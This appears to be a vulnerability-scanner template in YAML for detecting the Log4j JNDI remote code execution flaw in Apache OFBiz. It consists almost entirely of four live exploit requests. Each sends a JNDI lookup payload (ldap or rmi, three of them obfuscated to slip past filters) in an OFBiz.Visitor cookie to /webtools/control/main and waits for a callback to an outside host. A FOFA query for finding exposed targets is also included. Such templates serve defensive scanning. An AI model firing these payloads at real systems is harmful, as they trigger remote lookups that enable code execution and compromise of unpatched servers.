id: apache-ofbiz-log4j-rce

info:
  name: Apache OFBiz Log4j JNDI RCE
  author: pdteam
  severity: critical
  verified: true
  description: |
    FOFA: app="Apache_OFBiz"
  tags: apache,ofbiz,log4j,rce,jndi
  created: 2023/07/02

set:
  reverse: newReverse()
  reverseHost: reverse.url.host
rules:
  r0:
    request:
      method: GET
      path: /webtools/control/main
      headers:
        Cookie: OFBiz.Visitor=${jndi:ldap://{{reverseHost}}}
    expression: reverse.wait(5)
  r1:
    request:
      method: GET
      path: /webtools/control/main
      headers:
        Cookie: OFBiz.Visitor=${jndi:ldap:${::-/}${::-/}{{reverseHost}}}
    expression: reverse.wait(5)
  r2:
    request:
      method: GET
      path: /webtools/control/main
      headers:
        Cookie: OFBiz.Visitor=${${X::-j}ndi:rmi:${::-/}${X::-/}{{reverseHost}}}
    expression: reverse.wait(5)
  r3:
    request:
      method: GET
      path: /webtools/control/main
      headers:
        Cookie: OFBiz.Visitor=${XXX:${${X::-jn}${X::-di}:${X::-l}d${X::-a}p:${X::-/}${X::-/}{{reverseHost}}}
    expression: reverse.wait(5)
expression: r0() || r1() || r2() || r3() 